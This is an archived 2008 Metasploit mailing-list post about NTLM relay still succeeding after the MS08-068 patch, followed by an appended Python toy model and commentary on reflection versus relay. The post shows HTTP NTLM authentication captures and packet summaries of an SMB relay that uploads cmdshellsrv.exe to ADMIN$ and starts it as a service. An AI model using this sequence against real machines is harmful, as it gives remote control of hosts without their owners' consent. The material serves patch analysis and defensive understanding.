-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ArcSighter Elite wrote:
> ArcSighter Elite wrote:
>> ArcSighter Elite wrote:
>>> H D Moore wrote:
>>>> On Monday 22 December 2008, ArcSighter Elite wrote:
>>>>> I came this morning with something. Does the MS08-67 patch, which
>>>>> stops challenge keys from being replayed, also affect the other
>>>>> variants of the attack, such as HTTP 401 + WWW-Authenticate: NTLM,
>>>>> and the IMAP, POP and SMTP versions?
>>>> Supposedly it affects any component that initializes the security 
>>>> negotiation the "right" way, but only during a direct reflection attack. 
>>>> You can still relay to a third-party host regardless of protocol.
>>>> -HD
>>> Well, this is how we go.
>>> Before MS08-067:
>>> Windows XP SP2 Spanish:
>>> I totally owned. HTTP-based. No user intervention. No nothing. KIS2009
>>> doesn't block (find-socket).
>>> I totally owned SMB-SMB attack, UNC share.
>>> After MS08-067:
>>> I owned too! But this time I got a prompt asking for username and
>>> password; I mean, it doesn't automatically authenticate.
>>> The SMB-SMB attack doesn't spawn my shell.
> 
>>> Tell me what you think to proceed to XP SP3; although I think I will get
>>> the same results.
> 
>> Sorry about the typo: it is MS08-068 that I've applied, not MS08-067-netapi.
>> It's the right patch, and the results are above.
> 
> Well, surprisingly it seems to work in XP-SP3 too, before and after the
> patch. The interesting prompt about username/password authentication
> was my bad; I don't get a prompt on either XP-SP3 or XP-SP2 after I
> rebooted SP2.
> 
> 
> Here is what I've done (some hack in Python):
> 
> 1. Force browser to authenticate HTTP 401 + WWW-Authenticate: NTLM
> 
> Ex.:
> (Here *.*.*.1 is server, *.*.*.2 client)
> 
> GET / HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, */*
> Accept-Language: es
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
> Host: *.*.*.1
> Connection: Keep-Alive
> 
> HTTP/1.1 401 Unauthorized
> Content-Length: 0
> Content-Type: text/html
> Server: Microsoft-IIS/6.0
> WWW-Authenticate: NTLM
> Connection: keep-alive
> 
> GET / HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, */*
> Accept-Language: es
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
> Host: *.*.*.1
> Connection: Keep-Alive
> Authorization: NTLM TlR********AAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw==
> 
> //-- Avoid null sessions
> 
> HTTP/1.1 401 Access Denied
> Server: Microsoft-IIS/6.0
> WWW-Authenticate: NTLM
> TlR********ABgAGADgAAAAHsgAA+vnrqY91YSEAAAAAAAAAACwALAA+AAAABQEoCgAAAA9XAFMAMgACAAYAVwBTADIAAQAGAFcAUwAyAAQABgB3AHMAMgADAAYAdwBzADIAAAAAAA==
> 
> Content-Length: 0
> Content-Type: text/html
> 
> GET / HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, */*
> Accept-Language: es
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
> Host: *.*.*.1
> Connection: Keep-Alive
> Authorization: NTLM
> TlR********AAAAGAAYAHwAAAAYABgAlAAAABQAFABIAAAAGgAaAFwAAAAGAAYAdgAAAAAAAACsAAAABYIAAgUBKAoAAAAPMQAwAC4AMQA1AC4AMwAuADgANgBBAGQAbQBpAG4AaQBzAHQAcgBhAGQAbwByAFcAUwAyADl4VTbp6F8qOXhVNunoXyo5eFU26ehfKrY5HrAdIbqrX4QPLLSy0y8RPgbMsVX5gg==
> 
> 
> HTTP/1.1 200 OK
> Content-Length: 92
> Connection: close
> 
> 2. The basic replay attack (wireshark summaries only):
> 
> //- Negotiating
> 513   10.025748       *.*.*.1         *.*.*.2
> SMB   Negotiate Protocol Request
> 
> 516   10.026712       *.*.*.1 *.*.*.2 SMB     Session Setup AndX Request,
> NTLMSSP_NEGOTIATE
> 
> /-- Authenticating
> 520   10.029566       *.*.*.1 *.*.*.2 SMB     Session Setup AndX Request,
> NTLMSSP_AUTH, User: WS2\Administrador
> 
> /-- Accessing IPC$
> 523   10.034183       *.*.*.1 *.*.*.2 SMB     Tree Connect AndX Request, Path:
> \\*.*.*.2\IPC$
> 
> /--Accessing admin$
> 531   10.040157       *.*.*.1 *.*.*.2 SMB     Tree Connect AndX Request, Path:
> \\*.*.*.2\admin$
> 
> /--Uploading exefile
> 533   10.041749       *.*.*.1 *.*.*.2 SMB     NT Create AndX Request, Path:
> \cmdshellsrv.exe
> 
> /--Accessing service control manager.
> 561   11.066248       *.*.*.1 *.*.*.2 SMB     NT Create AndX Request, FID: 
> 0x4000,
> Path: \svcctl
> 
> /-- well I got tired.
> The rest you already know: binding, OpenSCManager, OpenService,
> StartService => owning!
> 
> So please give another point of view, because what I've realized here is
> that MS didn't fix this properly!
> 
> Sincerely.
> 

Excuse me for the one-person chat in here.
But let me say that Metasploit's smb_relay effectively fails after the
patch. We already know that; the curious thing is that my Python script doesn't.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJT/e1H+KgkfcIQ8cRAjfsAKD3yRwVgGblqWRTTRUUlr3EUSC5LACgyyiy
m+VB+AjtoSDmm3sJsum8jZ4=
=GHRB
-----END PGP SIGNATURE-----
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
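The thread turns on HD Moore's distinction between a direct reflection attack (the victim's own challenge is fed back to it) and a relay to a third host, which the patch does not stop. The model below is an added illustration of that distinction; it is not the Python script from the thread, not Metasploit code, and not Windows' real implementation. It assumes, as a deliberate simplification, that the MS08-068 mitigation can be modelled as a cache of challenges the local host has issued as a server, which its client side then refuses to answer; the host names, the `Host` and `ChallengeCache` classes and the HMAC-MD5 stand-in for the NTLM response computation are all constructed for the example.

```python
"""Toy model: an issued-challenge cache blocks NTLM reflection but not
cross-host relay. Constructed example; names and the response math
(HMAC-MD5 over the challenge) are stand-ins, not real NTLMv1/NTLMv2."""
import hashlib
import hmac
import os
import time


class ChallengeCache:
    """Remembers challenges this host handed out as a server.

    Assumed simplification of the MS08-068 mitigation: the client side of a
    host refuses to answer a challenge that its own server side issued
    recently, because a legitimate remote server would never send one.
    """

    def __init__(self, ttl_seconds=300, now=time.time):
        self._issued = {}          # challenge bytes -> time issued
        self._ttl = ttl_seconds
        self._now = now

    def remember(self, challenge):
        self._issued[challenge] = self._now()

    def was_issued_here(self, challenge):
        self._expire()
        return challenge in self._issued

    def _expire(self):
        cutoff = self._now() - self._ttl
        stale = [c for c, t in self._issued.items() if t < cutoff]
        for c in stale:
            del self._issued[c]


class Host:
    """One machine acting both as authenticating client and as server."""

    def __init__(self, name, accounts, patched):
        self.name = name
        self.accounts = dict(accounts)   # user -> secret (stand-in for NT hash)
        self.patched = patched           # whether the reflection check is on
        self.cache = ChallengeCache()

    def issue_challenge(self):
        """Server side (Type 2): hand out a fresh 8-byte challenge."""
        challenge = os.urandom(8)
        self.cache.remember(challenge)
        return challenge

    def answer_challenge(self, user, challenge):
        """Client side (Type 3): respond, unless the challenge is our own."""
        if self.patched and self.cache.was_issued_here(challenge):
            raise PermissionError("reflection blocked: challenge issued by this host")
        return hmac.new(self.accounts[user], challenge, hashlib.md5).digest()

    def verify(self, user, challenge, response):
        """Server side: check the response against the local account."""
        secret = self.accounts.get(user)
        if secret is None:
            return False
        expected = hmac.new(secret, challenge, hashlib.md5).digest()
        return hmac.compare_digest(expected, response)


def relay_through_attacker(client, target, user):
    """Man-in-the-middle flow: the attacker obtains a challenge from
    `target`, presents it to `client` as though the attacker were the
    server, and forwards the client's response back to `target`.
    Returns True if `target` accepts. When client is target, this is
    reflection; otherwise it is a relay to a third host."""
    challenge = target.issue_challenge()
    try:
        response = client.answer_challenge(user, challenge)
    except PermissionError:
        return False
    return target.verify(user, challenge, response)


def demo():
    # Constructed credential shared across hosts, as a domain account would be.
    creds = {"Administrador": b"constructed-nt-hash-standin"}
    unpatched = Host("xp-sp2-unpatched", creds, patched=False)
    patched = Host("xp-sp2-ms08-068", creds, patched=True)
    third = Host("other-host", creds, patched=True)
    return {
        "reflection_unpatched": relay_through_attacker(unpatched, unpatched, "Administrador"),
        "reflection_patched": relay_through_attacker(patched, patched, "Administrador"),
        "relay_to_third_host": relay_through_attacker(patched, third, "Administrador"),
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case}: {'accepted' if accepted else 'rejected'}")
```

Only the reflection case against the patched host is rejected; the relay to a different host succeeds regardless of patch level, which is why the defensive answer to relay is SMB signing or channel binding on the targets rather than a client-side check. A component that starts the security negotiation without going through this cache (HD's "right way" remark) would still answer its own challenge, which is one way to read the HTTP-to-SMB result described above.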
